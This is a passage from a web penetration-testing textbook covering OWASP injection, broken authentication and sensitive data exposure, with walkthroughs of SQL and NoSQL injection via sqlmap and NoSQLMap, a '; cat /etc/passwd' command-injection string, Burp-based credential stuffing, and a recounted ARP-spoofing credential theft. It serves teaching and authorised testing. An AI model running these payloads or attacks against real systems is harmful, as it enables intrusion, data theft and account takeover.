Product, Customer, and Account Password. To rst get a baseline of how the
application should normally process input and return output we will submit
test as the input for the Product and Customer text boxes and submit the
form by clicking View, as seen in Figures 2.2 and 2.3, respectively.
14 The Penetration Tester's Guide to Web Applications

Figure 2.2 Order details in our browser prior to being submitted.

The resulting page shows the query including the rudimentary authentication
mechanism worked and no results were returned.

Figure 2.3 Results of the previous request.

Next we will perform the same action only substituting test with test' - note
the single quote character and refer to Figures 2.4 and 2.5. The hope is that
we will see a dierent result in eect conrming the application is dynamic
and the inputs we submit are being used to perform a query.
OWASP A1:2017 Injection 15

Figure 2.4 Input with a single quote being submitted.

Figure 2.5 Results showing a SQL error.


There is a dierent message being shown, "You have an error in your SQL
syntax; check the manual that...". This message is a clear indicator that the
Product and or Test parameters are being used in an unsanitized fashion
to execute a SQL query and in fact the single quote character is being in-
terpreted literally by SQL. It is because of this that the error message is
showing (coupled with error messages being enabled). At this point we have
a level of condence that there is a SQL injection vulnerability which we
have successfully identied. Now we need to move onto exploiting this aw
in a meaningful way. With SQL injection we have to understand that we
are inserting our malicious strings into an input, submitting the input which
is then parsed by the application and being used directly in a SQL query.
This means that we now have control over how the query (SQL statement)
is going to execute. What we need to determine next is what type of query
our input is being used in (SELECT, UPDATE, DELETE, etc.) as well as
where in the query the vulnerable input is being inserted. Which database
the application is querying as well as the table(s) and column names is also
relevant as is the type of SQL language being employed. Oracle syntax diers
16 The Penetration Tester's Guide to Web Applications

from MS SQL syntax for example and knowing which language is being used
will help us craft our attack in a manner for it to be successful. A typical
query apropos for this example might be, "SELECT * FROM tablename
where product='$productname' and customer='$customername'". Based on
this pseudocode (query) the two parameters, "productname" and "customer-
name" are what we as an attacker can inject into, thus potentially changing
the results of the query. For instance, instead of submitting test' in the Prod-
uct input eld, let's see what happens when we submit test' or '1'='1'  into
the Product input box as seen in Figure 2.6. The output shows results for all
of the products in the database of the vulnerable application. Further and
meaningful exploitation of this nding will hinge on what other data is in
the database and while manually nding this out, now is a fair time to intro-
duce a tool to help automate this attack. The tool we will be using is called
sqlmap, which is an open-source Python-based tool specically written to aid
in SQL injection attacks. The best way to become familiar with the tool, in
addition to using it repeatedly in various circumstances, is by invoking it on
the command line with the hh option to see a quick reference of its options
as seen in Figure 2.7.

Figure 2.6 Results of SQL injection showing all product information.


OWASP A1:2017 Injection 17

Figure 2.7 sqlmap advanced help message.

Sqlmap can be used to help in the identication phase of SQL injection as


well as during the exploitation phase. Since we have already identied a
vulnerable input on the target application, we can leverage this tool to assist
with exploitation. Taking a closer look at the request being made to the
vulnerable application shows a POST request being submitted to a URL of
sqlipost.php. This is evident when using our browser to submit the request
with Burp Suite to inspect the request (note the POST payload does not
have any injection/attack string) as seen in Figure 2.8.
18 The Penetration Tester's Guide to Web Applications

Figure 2.8 POST request as seen from Burp.

The advantage of using an interception proxy like Burp is for clarity on


the POST payload as well as the resource/page the request is being sent
to. Oftentimes our requests may be submitted by JavaScript to a less than
obvious page or endpoint, thus having this visibility is very useful coupled
with the fact we will want to use the payload as seen in Burp when submitting
our attack with sqlmap. Once again, reviewing sqlmap's options shows that
to specify POST data the data option can be used so our sqlmap command
to attack this application will be as described in Figure 2.9.

Figure 2.9 sqlmap command line syntax specifying POST payload via "data"
argument.

As expected, sqlmap is able to identify the injection vulnerability, which is


evident in the command line output from the tool as seen in Figure 2.10.
OWASP A1:2017 Injection 19

Figure 2.10 sqlmap results showing successful identication of injection location.


In fact, sqlmap discovered both the cn and pn parameters are vulnerable to
SQL injection, it took 205 HTTP requests to identify this and for clarity, the
cn parameter is the name of the HTML input corresponding to Customer or
Customer Name while the pn parameter corresponds to Product Name on
the HTML form we are attacking.
To recap what has happened, we were presented with an HTML form with
several input boxes. When submitting a special character to the application
(the single quote) we noticed a SQL error message being displayed. From
there we invoked Burp to get visibility into the details of the POST payload
being sent and used this information to leverage the SQL injection tool,
sqlmap, to gain more insight into the vulnerability. But what did sqlmap
actually do? We know it sent 205 HTTP requests and in looking at its output
we know it worked, but to answer the question of what it did, we will want
to inspect its requests with Burp. We can do this by rerunning the tool with
the proxy option congured to send its trac to our Burp instance (in this
case 127.0.0.1:8080). Now when we run sqlmap again, we can see exactly
the requests it is sending and this will help us understand what the tool is
doing and how it is identifying the injection vulnerability. For the purposes of
education, it's also relevant to specify the ush-session option for sqlmap to
start fresh instead of having sqlmap remember the successful injection points
and strings it has already found (in a real-world attack scenario this is the
20 The Penetration Tester's Guide to Web Applications

opposite of what we would want to do as it would be particularly inecient).


Running sqlmap with the proxy="http://127.0.0.1:8080" argument will now
allow us to leverage Burp to see exactly what sqlmap is doing. To exploit the
vulnerability, once the aw has been conrmed, sqlmap has several options
to assist with this as we can see in Figure 2.11.

Figure 2.11 sqlmap advanced help specic to enumeration.

By specifying the dump option we are able to dump the contents of the
database successfully, as we can see in Figure 2.12.
OWASP A1:2017 Injection 21

Figure 2.12 Output of successful data dump.

To further understand what sqlmap is doing, inspect each request it makes


using Burp (having sqlmap send its requests to Burp enables us to inspect
its requests) and consider spending more time with the SQL language to get
a deeper understanding of the syntax and commands.
Exploitation of NoSQL implementations is similar in nature to other in-
jection attacks. NoSQL databases don't structure data in the same way as
SQL databases although the wide and varying goals and implementations of
this technology make sweeping/generalized statements less than ideal. The
data model for NoSQL databases range from relational (like SQL databases),
key-value, column-oriented to document-oriented as well as others. Depend-
ing on the data model, the exibility, performance, and scalability of a given
solution will vary; know that there are well over one hundred dierent types
of NoSQL databases and while some actually are relational in design and
support SQL syntax most do not. For our purposes as attackers, what we
need to understand is that our attack syntax will vary signicantly depend-
ing on the type of database being used by the application, but the injection
22 The Penetration Tester's Guide to Web Applications

points and way we go about injecting does not change tremendously.


One of the more popular NoSQL implementations is MongoDB and the
NoSQL database we'll exploit in this next example. The interface for the web
application is not dened by the database; thus, in this example the website
and forms look the same and we will once again be attempting to inject
into the pn and cn POST parameters of the HTML form  just as we did
with the traditional SQL injection aw previously discussed. The dierence
will be the payloads we use and of course the back-end database technology.
At this point in the discussion about injection vulnerabilities it should be
evident that creating or otherwise obtaining a predened list of injection
payloads is very important. Testing for injection can be manual (copying
and pasting payloads into visible inputs) but is more eciently accomplished
using automation where we can specify an input list of injection payloads
and leverage a tool to attempt to utilize those payloads for various inputs.
Obtaining a list of payloads/wordlists is a web search away, and for NoSQL
payloads the "$where" string will be common as MongoDB uses an API call
allowing input (JavaScript and unserialized JSON) with the $where operator.
Akin to traditional SQL, the where operator in MongoDB is used to lter
the objects being queried to add a level of specicity.
A suitable series of strings compatible with NoSQL injection should be
saved to a basic text le with one string per line as this format will be ideal as
we import it into other tools to help with the automated attack/identication
of the aw. A le such as what we see in Figure 2.13 will suce for this
example. Submitting these handful of strings manually is not labor inten-
sive but for larger lists of thousands of lines/strings, we would automate
this via Burp's Intruder tool, ZAP's fuzzer function, or by writing a custom
script/tool to accomplish this task (either making heavy use of wget/curl or
Python's httplib). For now we can simply copy and paste one string at a
time into the inputs in the browser and proceed to submit them as shown in
Figure 2.14.
OWASP A1:2017 Injection 23

Figure 2.13 nosql potential injection strings.

Figure 2.14 nosql injection attack strings being submitted via the HTML form.

The resulting page shows an error indicative of NoSQL injection as we can


see in Figure 2.15.
24 The Penetration Tester's Guide to Web Applications

Figure 2.15 Error message indicative of a nosql error.

Note once again that in a real-world scenario an evident error message is not
always present and even when we are presented with an error, the message
may not be clear or helpful. As we have been presented with an error, we
could manually continue to exploit the application, the success of which will
hinge on our knowledge of the back-end database, the syntax, and our mas-
tery of the SQL (NoSQL)language. In this case it may be benecial to once
again look to a tool to assist in the exploitation of the aw. Akin to sqlmap,
NoSQLMap is a tool that attempts to aid in NoSQL injection attacks. It is
not as mature, reliable, or as feature-rich as its namesake, but we can at-
tempt to use it in this scenario. To do so, we can invoke NoSQLMap via the
command line and proceed to set the required parameters before executing
the attack. We can follow Figures 2.16, 2.17, 2.18, and 2.19 for insight into
how to do this.

Figure 2.16 nosqlmap tool's initial options.


OWASP A1:2017 Injection 25

Figure 2.17 nosqlmap providing the options to hone our attack.


26 The Penetration Tester's Guide to Web Applications

Figure 2.18 nosqlmap executing its initial attacks on the target application.
OWASP A1:2017 Injection 27

Figure 2.19 nosqlmap showing a successful injection and applicable vulnerable URLs.

The results of the attack can be viewed in a browser to reveal the dump of
database information as shown in Figure 2.20.

Figure 2.20 Viewing results of nosqlmap's successful attack in browser.


As with traditional SQL injection, we will want to consider spending more
time with the given SQL database technology and language to get a deeper
understanding of the syntax and commands. Doing so will help with manual
exploitation and modifying tools to aid in successfully exploiting this type of
attack.
28 The Penetration Tester's Guide to Web Applications

Executing OS commands via a vulnerable web application is typically a


critical vulnerability as it allows an attacker to have an inappropriate level
of control over the OS. To exploit command injection vulnerabilities, once
we know the OS the vulnerable application is running on, it will help if we
can leverage a list of common command injection attacks and automate the
sending of these attacks to the vulnerable application. If we do not know
what the underlying OS is, we can look to certain indicators to help identify
the OS such as case sensitivity in the URI. While not 100% accurate, just by
changing an uppercase letter to a lowercase one in the URI and resubmitting
the GET request we can sometimes identify whether the underlying OS is
Windows or not. As Windows servers are typically case insensitive, if the
resulting page is the same vs a 404, we can come to a reasonable assumption
as to the type of OS being employed.
Other ways of identifying the OS are by examining the headers, which
will sometimes show the OS or the webserver software in use. Once again,
this is not an exact science, but there are only a few cases where an IIS server
will be running on something other than Windows. In addition, we can look
for indicators of the language being used which can help narrow down the
OS as well as leverage our previous reconnaissance; but we do want to know
what type of OS is being used as this will help us craft a suitable command
injection attack.
As with other forms of injection, devising a list of strings appropriate for
the OS is important for this attack, however, there will be times when we
simply don't know the OS version and a mixed list comprised of commands
specic to diering operating systems will suce. A suitable list for this
type of attack might include common commands such as, "id, ls, dir, ping,
nslookup, cat, etc." prepended and appended with command separators and
le paths, respectively, thus a complete string might be:
; cat /etc/passwd
Just like with SQL injection, the results of the attack may not be readily
visible in the resulting HTML displayed back to the browser and as previously
mentioned, setting up a VPS to listen for trac will be helpful or otherwise
leveraging a machine to listen for callbacks.

Link to hands-on portion: https://tptgtwa.com/owasp1


Root Cause and Conclusion: The root cause of injection vulnerabilities
stems from a lack of input sanitization, meaning that when a user/attacker
submits input, this input is not being adequately checked for maliciousness.
OWASP A1:2017 Injection 29

The malicious input is subsequently used in a dynamic nature to either run a


query, execute a command, or otherwise interact with the vulnerable system
to cause harm. Identifying these aws can be challenging and the success of
being able to do so relies on having a solid understanding of the underlying
application stack (OS, webserver, language(s) and database) and attack sur-
face. Using automated tools can help with exploitation eorts greatly when
wielded properly.
The most common web programming languages all provide well-documented
ways to address SQL injection and, as such, parameterized queries are typ-
ically available to mostly eliminate this vulnerability. For other forms of in-
jection, special care needs to be taken to ensure the input being provided
by the user is sanitized. We as penetration testers need to identify the back-
end platform and devise a suitable attack based on this platform to ensure
the attack strings we are submitting actually have a chance of exploiting a
possible vulnerability. To that end we want to make sure our fuzzing lists
are regularly updated with our own custom strings. Furthermore, we want to
take special care before exploitation to not cause harm to the business since
there is considerable risk with this type of attack pertaining to the con-
dentiality, integrity, and availability of the systems we are attacking. Finally,
knowing how to identify and exploit these aws manually is integral for us to
be able to properly congure our tools to help automate these attacks and
troubleshoot the tools when they fail to work as intended.
Chapter 3

OWASP A2:2017 Broken


Authentication
Denition: Application functions related to authentication and session man-
agement are often implemented incorrectly, allowing attackers to compromise
passwords, keys, or session tokens, or to exploit other implementation aws
to assume other users' identities temporarily or permanently.

Details: The second most critical web application security risk is Broken
Authentication and the previous denition is provided by OWASP (as others
will be in subsequent chapters). The concept of Broken Authentication en-
compasses many aws that we will discuss in this chapter. Web applications
utilize the HTTP protocol to communicate, which is stateless in nature. This
means that every request a user/client sends to a web application is treated
and understood as a new request  unaliated with previous requests. This
inability to natively group a series of requests together has obvious short-
comings; for instance, how does a web application know whom a user is?
The answer to this is with some form of session management, a means by
which the application can establish an understanding that requests with a
unique identier should be treated as the same user essentially. This unique
identier is typically a cookie or token, but it doesn't have to be. Any unique
string sent back and forth from the client to the server will suce, as long as
the application and client can keep track of it. Session management can be
implemented in the form of a unique string in the address bar of our browser,
as is the case with a Java Session ID as seen in Figure 3.1.

31
32 The Penetration Tester's Guide to Web Applications

Figure 3.1 Browser's address bar showing Java session ID.


Or our session can be managed via hidden form elds such as with the dated
.NET ViewState coupled with an ASP.NET session ID (cookie) or a cookie
as PHP uses. When we visit a website which has a login feature and the
session management is handled by a cookie, it is this unique string which
will account for our session state, and understanding this will help us know
how to best attack the application. Upon our rst visit to a web application,
the application will send a set cookie directive and tell our browser what the
value and parameters of the cookie are such as the name of the cookie, when
it expires, its scope, and what ags are enabled (Secure, HTTPOnly, and
SameSite). Our browser then remembers that cookie and sends it back un-
modied with every subsequent request we make; by doing so the application
is able to distinguish our requests from other user's requests. Likewise, once
we login to the web application the cookie value should change (unless there
is a session xation vulnerability) and continue to be sent with every request
our browser makes. This is how basic session management works and we can
see this in action by leveraging a browser and interception proxy - the output
of which is seen in Figure 3.2.

Figure 3.2 HTTP response header showing cookie being set.


Using a cookie or session ID or some unique identier is how an application
handles session management; authentication, however, is the process of prov-
ing we are who we claim to be in the context of logging into the application.
There are myriad ways to implement the process of authentication in an in-
secure fashion and there are several choices to choose from when a developer
considers how to authenticate a user to an application. The most common
way modern web applications authenticate a user is by leveraging what is
referred to as forms-based authentication : The familiar username and pass-
word inputs on a web page which we are typically presented with as a means
OWASP A2:2017 Broken Authentication 33

to login. From an attacker's perspective, we have to appreciate what hap-


pens when a developer devises a login system and what has to be accounted
for to secure it; the deeper we understand this, the better we can craft our
attacks. Let's consider forms-based authentication: a web application with a
form containing username and password elds (and potentially other inputs
designed to challenge the user) as we can see in Figure 3.3.

Figure 3.3 Typical login form for user authentication.

What happens when a user submits this form? What back-end process-
ing/logic is being employed to check if the values submitted by the user
are valid and how does the application handle errors, invalid input, password
hashing, session management, password resets, account creation, two-factor
authentication, failed login attempts, account lockouts, request throttling, IP
banning, dictionary attacks, logout requests, and so forth? Creating a web-
site that has a login form is not overly challenging but creating a pleasant
user experience while implementing sucient security controls is extremely
challenging, which is why this is the second most critical web application
security risk: It's hard to do well. And to be clear, there is no standard way
to implement this type of authentication as a developer can choose to ask
whatever questions they like, as well as integrate with multifactor solutions
or even biometrics if desired. Conversely, the level of security being imple-
mented using forms-based authentication can be essentially nonexistent; the
approach taken when using this method is entirely nonstandard.

Real-World Dialog: One of the more interesting fails I have seen through-
out my career as a penetration tester is a rather oddly implemented password
reset feature on a custom application in the nancial sector. The web appli-
cation I was testing looked like any other modern web application, complete
34 The Penetration Tester's Guide to Web Applications

with common features such as the ability to create your own account, login,
change your password, access a dashboard, and so on, as well as the option
to reset your password in the event that you forgot it. Study Figure 3.4
and think about how the application ought to work given this background
information.

Figure 3.4 Password reset form.

Logically we might provide our username and email address, submit them
and the application will in turn check to see if the email address is valid and
belongs to a user account corresponding to the username that we provide.
This way, the user submitting the form has to know the username and email
address associated with that username in order to successfully issue a pass-
word reset request. Following this logic, if the username and email address
are valid and associated with each other, then the application will send a
password reset link to the provided user's associated email address. Seems
easy. . .
In reality what this form did was allow a user to put in a username and
ANY ARBITRARY email address the user wanted. It then checked to see if
the username was that of a valid user account, and if it was, then the appli-
cation would send the password resent link to the email address indicated by
the user (as opposed to the email address associated with the account). This
was of particular concern due to the application being vulnerable to username
harvesting/account enumeration. This means that I was able to conrm valid
users of the application using the username harvesting aw, reset their pass-
words, and receive the link to update their password in my inbox! This type
OWASP A2:2017 Broken Authentication 35

of poorly calculated logic is what enables attackers to compromise accounts


with ease and something we have to think about when testing for broken
authentication.

How to Exploit: Exploiting broken authentication comes in many forms.


The rst one we will explore is credential stung. OWASP, I think, has a
record of sometimes coming up with less than apropos names for attacks
and vulnerabilities (remember Insecure Direct Object References. . . ) so to
be clear, credential stung is simply: using educated guesses for both the
username and password elds of a web application to try and login. Note the
condition of educated and the fact that this attack works best when auto-
mated. Typing in and submitting credentials is not ecient or necessary as we
have tools at our disposal to automate this attack. The educated component
of this attack takes into account the large quantity of exposed credentials
which have been made public over the years as a result of compromised web
applications and their associated user's passwords. Vast lists (think hundreds
of millions) of common passwords are available for us as attackers and while
username lists are available as well; the process of identifying valid usernames
for an application is possible in almost all modern applications for reasons
to be discussed in the username harvesting section of this book. To exploit
a aw, we typically try to identify if the aw is present rst, and in the case
of a credential stung vulnerability, the identication of the vulnerability
comes from conrming that the login page of the application allows us to
submit credentials. While basic in some cases, the web application or a secu-
rity device (typically WAF) may prevent us from being successful by blocking
our requests or locking out an account after a certain number of failed lo-
gin attempts. We need to know our target environment; for instance if the
web application deals with credit cards, then it has to lockout user accounts
after six failed login attempts for a minimum of thirty minutes in order to
be PCI compliant. Also note that locking out a large quantity of valid user
accounts is not always in the best interest of the business and, as such, it
may be pertinent to discuss this type of attack with the business/client prior
to proceeding.
This is how we succeed in a credential stung attack: We rst obtain a list
of passwords to use (Kali Linux has a built-in list in /usr/share/wordlists for
example) and obtain a list of usernames to use (read the username harvesting
sections in Chapter 12 to gather those if need be). By using valid usernames,
we already have 50 percent of the required information to login to the account
and all that is left to do is automate the process of guessing passwords. And
36 The Penetration Tester's Guide to Web Applications

let's be smart about this attack: If the application clearly enforces password
complexity requirements for user accounts (like a minimum of 8 characters, at
least one uppercase/lowercase/number/special character, etc.), then we need
to modify our password input list to conform to the requirements, otherwise
we are just wasting time and lacking professionalism. On this professionalism
topic, also consider the sheer number of requests we will be sending for this
attack and the impact this can have on the web application, infrastructure,
and business (10,001 user accounts times 1,000,000 password guesses equates
to over 10 billion requests), so be sure to plan accordingly. We can accomplish
the automated portion of this attack by using a custom written script or
interception proxy tool such as Burp Suite. When using Burp Suite, we rst
prime the interface by using our browser integrated with the proxy to make
a login request to the application and choose to send that (typically POST)
request to Burp's Intruder feature as seen in Figure 3.5.

Figure 3.5 Burp's fuzzer (intruder) showing a "Cluster bomb" conguration.

Burp Intruder is a fuzzing tool which we can use to automate the attack
by populating the username and password parameters with the lists of user-
OWASP A2:2017 Broken Authentication 37

names and passwords previously discussed. Burp Intruder will then, depend-
ing on how we congure it, proceed to try to login to every username we
provided using all one million passwords and continue to do this for each ac-
count, hence the excess of ten billion requests. For this example we will not
need or want to send so many requests, also note the cluster bomb option
and utilize Burp's help section for details on the injection options available.
In order to specify multiple payload positions with diering payload lists, the
cluster bomb option is ideal. In this fashion we can specify the usernames
and passwords we want to attempt to login with, as seen in Figure 3.6.

Figure 3.6 Payload options for the rst payload.

The rst payload set (from left to right, top to bottom per the previous
Positions tab in Burp) is the usernames while the second payload set is the
passwords. We can see the conguration for this in Figure 3.7. Once this
attack is launched, Burp will proceed to attempt to login with each username
password combination until it exhausts its input lists.
38 The Penetration Tester's Guide to Web Applications

Figure 3.7 Payload options for the second payload.

The results of this credential stung attack are not evident unless we know
what to look for. When a successful login occurs (our attack was able to guess
the right username and password combination) the application may issue a
redirect (HTTP response code 302) or the size of the response may be larger
than that of failed logins. It is incumbent upon us to identify what constitutes
a successful login and use this information to identify when accounts were
successfully compromised.
Guessing passwords is not ideal although it is an attack focused directly
on the application (and indirectly on the guessability of weak passwords) and
it works in many circumstances. There are, however, other ways to exploit
broken authentication, such as bypassing it completely.
One such bypass technique is attempting to directly access the pages (or
functions) of an application without logging in rst. This method requires
knowledge of the protected pages  the pages of the application which should
only be accessible when logged in. For single-page applications there is less
focus on the page, since there is only one, and more of a focus on the func-
tion/endpoint being called. For traditional and single page applications, the
best way to go about testing for this aw is by leveraging our test credentials
while making note of the pages or functions which are accessible once logged
OWASP A2:2017 Broken Authentication 39

into an account. It is important to note the use of administrative credentials


because in this case having access to an elevated account will often yield the
information required to test this functionality. Specically we are looking for
what additional navigation links an administrator has, what additional fea-
tures of the application are accessible to administrators  look for le upload
capability, account management options (add, delete, modify user accounts),
SQL query, VNC, log viewing, and other sensitive options only the admin-
istrator should have access to. Taking notes in this case can be as simple
as copying and pasting the URL to Dradis, OneNote, Notepad++, or other
applicable software we are using for keeping notes for our penetration test.
It is not uncommon for certain functions or administrative options to be ac-
cessible via POST request only; thus, using Burp/ZAP at all times during
this type of attack is benecial as a source of record for HTTP requests.
Once we have noted all of the interesting pages the next step is to logout of
the application (delete cookies, close browser) and attempt to simply access
all of the URI's previously recorded. In the event the function was a POST
request, leverage Burp to resend the request via the repeater feature. The
two basic types of requests we want to attempt to submit are the requests
with no credentials (unauthenticated) as well as trying to access sensitive
pages/functions and requests submitted while logged into an unprivileged
account to try and access administrative level functions. An example of this
would be trying to access the create account page when not logged in, and
then submitting the POST request required to create a new user account
when logged in as a regular user. This way, we test if we can access the page
as a regular user. Pay special attention to cookies, unique HTTP headers,
and hidden form elds when checking for the existence of this authentication
bypass aw as the application may be doing a poor job of enforcing security
protections when certain attributes are set in client-side variables.
The key to successfully attacking an application as it pertains to broken
authentication is knowing or learning which defenses are employed and how
to bypass them if they exist. Couple this with using the convenience/usability
of the application against itself.
Typical defenses for credential stung are account lockouts or two-factor
authentication. Most applications either don't support two-factor authenti-
cation or users choose not to use it due to the inconvenience of this option.
Another defense to thwart or at least notice an automated attack such as
username harvesting and dictionary attacks is logging and alerting  a whole
chapter is dedicated to this but for now know that as with two-factor au-
thentication, most applications do not implement this control either. We as
40 The Penetration Tester's Guide to Web Applications

attackers need to identify which controls are in place in order to tune our
attacks to bypass the control. For example, noticing how many failed login
events it takes to trigger an account lockout and determining how long the
account will remain locked out before automatically being reset. This can be
identied by locking out a legitimate account and tracking how many failed
logins were required to trigger this condition in a given timeframe.

Examples: Logging in via the administrator account shows navigational


links the administrator has access to, which a nonadministrative account
does not have showing in its UI, as seen in Figure 3.8.

Figure 3.8 Browser view of basic web interface.


Looking at the address bar in the browser we can see the various URIs ac-
cessed as an administrator. With this information we can now attempt to
browse to each location manually after we logout, as noted in Figure 3.9 and
3.10.

Figure 3.9 Browser's address bar showing name of page.

Figure 3.10 Browser's address bar showing name of another page.


Using Burp (as shown in Figure 3.11) to view the POST requests submitted
via the administrator account we can see the specic requests made. Subse-
quently we can try to submit the same request as an unauthenticated user
or as a regular user lacking administrative rights.
OWASP A2:2017 Broken Authentication 41

Figure 3.11 Post request as seen from within Burp.


Viewing the password policy (indicated in Figure 3.12) allows us to create a
crafted wordlist to use for credential stung.

Figure 3.12 The password policy for user accounts of a given web application.
This can be accomplished by starting with a list of passwords (such as from
/usr/share/wordlists/rockyou.txt.gz in Kali) and using bash to lter out only
the conforming passwords from the 14 million+ passwords in the le. A com-
mand to output all 8+ character words can be seen in Figure 3.13.

Figure 3.13 Grepping for 8 or more characters.


A command to output all 8+ character words with at least one number
(building o of the last command by using its output) is shown in Figure
3.14.
42 The Penetration Tester's Guide to Web Applications

Figure 3.14 Grepping ltered results for strings with at least one number.

A command to output all 8+ character words with at least one number and
at least one special character is shown in Figure 3.15.

Figure 3.15 Grepping ltered results to match strings with special characters.

These eorts took the initial input of over 14 million passwords and pared
them down to just over 450,000 passwords that all meet the password com-
plexity requirements of the target web application. Taking this approach
results in a wordlist which has been tuned to yield the best results.

Link to hands-on portion: https://tptgtwa.com/owasp2


Root Cause and Conclusion: Broken authentication applies to a multi-
tude of mistakes developers can make when implementing an authentication
process for a web application. It is challenging to produce an interface which
is both convenient for users and will be widely adopted by a large and diver-
sied user base; some applications block known weak passwords while others
institute a password strength meter. It is also becoming more common to of-
fer two-factor authentication but user adoption is typically low in this realm.
In the world of information security, users are typically a weak link and the
application developer can't secure the account alone. It takes users choos-
ing strong passwords, not reusing those passwords, and enabling two-factor
authentication coupled with proper HTTP security headers, proper hashing
and salting in the database, and proper implementation of security controls
at the application layer to adequately address this aw. The security of user
accounts is a shared responsibility and due to this, we can often attack the
application to target users and compromise accounts via the deciencies and
attacks discussed in this chapter.
Chapter 4

OWASP A3:2017 Sensitive


Data Exposure
Denition: Many web applications and APIs do not properly protect sensi-
tive data, such as nancial, healthcare, and PII. Attackers may steal or mod-
ify such weakly protected data to conduct credit card fraud, identity theft, or
other crimes. Sensitive data may be compromised without extra protection,
such as encryption at rest or in transit, and requires special precautions when
exchanged with the browser.

Details: The exposure of sensitive data comes in several forms and typically
stems from an application owner failing to properly protect data at rest (in
the database) or in transit. We as attackers can take advantage of this aw
once we identify it. The scope of this aw can be weaknesses in client-side
security as well as server-side security, as both endpoints have to be con-
gured correctly to eectively reduce the likelihood of this type of attack
causing harm. Sensitive data essentially equates to anything that should be
kept private, could be used to compromise the session, cause a breach, or
is otherwise a prime target for an attacker. Such data would be the session
token, credit card information, credentials, keys, or nancial records. To gain
access to these resources we can rely upon other OWASP top ten vulnera-
bilities such as Injection, Cross-Site Scripting, XML External Entities, and
others to provide the initial point of access. There are, however, somewhat
passive ways we can identify where to look to nd likely paths to the ex-
posure of sensitive information. HTTP headers are a smart place to look 

43
44 The Penetration Tester's Guide to Web Applications

specically paying attention to how the application tells the browser to cache
resources and checking to see if the HTTP Strict Transport Security Header
(HSTS) has been set. HSTS is a means by which an application can enforce
browsers to communicate with the application over an encrypted connection.
When this header is not in place and both HTTP and HTTPS connections
are available for a web server (even if a redirect from HTTP to HTTPS
exists) we as an attacker may be able to compromise the connection and ex-
pose sensitive information. In addition, browsers will cache pages even over
HTTPS depending on how the web server is congured, which means that
on the client-side there may be an exposure of sensitive information that can
be subsequently compromised.
There are other times when an application may be congured to store
sensitive information in a hashed form in the database, such as for user's
passwords, but when the wrong hashing algorithm is in use this too can lead
to predictable results. A famous case study is the repeated Yahoo! breaches in
which it was it made public knowledge that the multibillion-dollar company
was hashing user's passwords with an algorithm inappropriate for this task:
MD5. In this case the password hashes were compromised and subsequently
many were cracked with ease. The idea of an application exposing sensitive
data can stem from insecure settings, a lack of proper congurations, and
the like. We as an attacker can take advantage of this by looking for a lack
of encryption or weak cipher suites, case insensitivity with password inputs,
or otherwise weak hashing algorithms and cacheable sensitive information.

Real-World Dialog: During a penetration test of a client's environment


I discovered the web server was listening on port 80 (HTTP), port 443
(HTTPS) and was missing a multitude of HTTP security headers, which
is very common  among the missing headers was the HTTP Strict Trans-
port Security (HSTS) header. The missing HSTS header coupled with the
server listening on port 80 meant that even though a HTTPS redirect would
occur as a response to the initial HTTP request (301 redirect to HTTPS://)
if I could get between the client and the server, I could eectively launch
a TLS downgrade attack from my man-in-the-middle (MITM) position and
redirect the client to a fraudulent website. To eectively launch this attack
I needed to be on the same subnet (essentially) as the victim and the cor-
porate WIFI network was the perfect location per the rules of engagement,
as I was on-site for other testing which was running concurrently. An ARP
spoong attack resulted in some client machines thinking my computer was
a legitimate source for DNS responses. This masquerade was leveraged to
OWASP A3:2017 Sensitive Data Exposure 45

ensure the victim attempting to access the intended web application was
instead communicating with my machine over HTTP. The HTTPS redirect
never happened, the browser never knew to connect over HTTP to verify the
authenticity of the web server, and subsequently, when my fake website pre-
sented the user with input boxes requesting credentials, the victim happily
provided them. I, in turn, was able to redirect the user to the real website
to avoid suspicion while using the credentials myself to gain access to their
account.

How to Exploit: The category of sensitive data exposure is just that, a


category and therefore lends itself to exploitation via multiple paths. As an
attacker we want to look for the aforementioned weaknesses and capitalize
on them to expose the sensitive information, whatever it may be.

Examples: The rst example exploit to divulge sensitive information is to


take advantage of improper caching settings. Like HSTS, caching is typically
controlled via HTTP headers and identifying a poor conguration is as simple
as inspecting the headers sent from the server to our browser. Specically,
caching is a means by which a web server can save information on the client
side (browser) to greatly increase speed when serving content. Typically,
images, css, javascript and entire pages of HTML are requested once, cached,
and served from cache (if they haven't changed since the last time they were
requested) to subsequently load a web page in a fraction of a second as
opposed to transmitting all of the content repeatedly. The risk here is that
when sensitive information is cached by the browser such as PCI data, form
data, and other content not meant to be saved to a user's hard drive. Usually,
the following headers are set to ensure content sent over HTTPS connections
is not cached:
Cache-Control: private, no-cache, no-store, max-age=0, no-transform
Pragma: no-cache
Expires: 0
Astute readers will note the redundancy which is sometimes necessary
when trying to communicate an unambiguous request to the browser (as well
as intermediary proxy servers) to not cache the content. Gaining access to
cached sensitive content would in most cases require access to the victim's
computer (such as in a shared computing scenario) or access to the proxy
server in the event sensitive content is being cached at that hop. An eective
way to view cached content is by using the same browser previously used to
perform the sensitive transaction(s) and navigating to the history to search
46 The Penetration Tester's Guide to Web Applications

for the page(s) of interest. Once loaded, click the back button in the browser
to see what was previously entered in the input boxes or in the address bar via
a GET request. Note that each browser handles history, cached content, and
saved form data dierently, and thus this method may not directly divulge
sensitive information, but sometimes it can, as seen in Figure 4.1.

Figure 4.1 Cached browser contents.

In a Windows environment, another way to view cached content is to use


a tool called IECacheView, which will work with Windows 10 and Edge.
This tool makes use of the cached les located in this directory and its sub-
directories:
\Users\%\AppData\Local\Packages\Microsoft\.MicrosoftEdge_8w..we\AC
We can use this tool to get an HTML report (shown in Figure 4.2) of all
the cached content and search for leakage of sensitive information.
OWASP A3:2017 Sensitive Data Exposure 47

Figure 4.2 Output from the IECacheView tool.

Alternatively, Firefox cached content on a Linux system is located at:


/home/%/.cache/mozilla/refox/nfg.../cache2/entries
The les in this directory don't show an extension, but are gzipped and
can be decompressed and viewed with a command such as:
gunzip -dfc nameole | less
Sensitive data exposure can result in the output of user credential databases
which is very often the topic of publicly disclosed breaches. When we get a
dump of credentials, either directly using an injection aw for example, or
indirectly during reconnaissance on the target web application/business, we
need to be able to crack the hashes to gain access to the original creden-
tials. To do so we can use various tools to help, such as hashcat, John the
Ripper, and RainbowCrack. What we want to pay special attention to is the
format of the hash and whether or not salting was used. If we were able to
expose hashed user credentials it will be incumbent upon us to learn what the
hashing algorithm was as well as the unique salts and rounds for each user ac-
count. Specically, depending on the hashing algorithm and implementation
within the application, user passwords may be hashed multiple times/rounds
(to increase the attackers diculty/cost in cracking them when exposed) and
if securely coded will also have a unique salt for each password to ensure the
same password for multiple users will not result in the same password hash. If
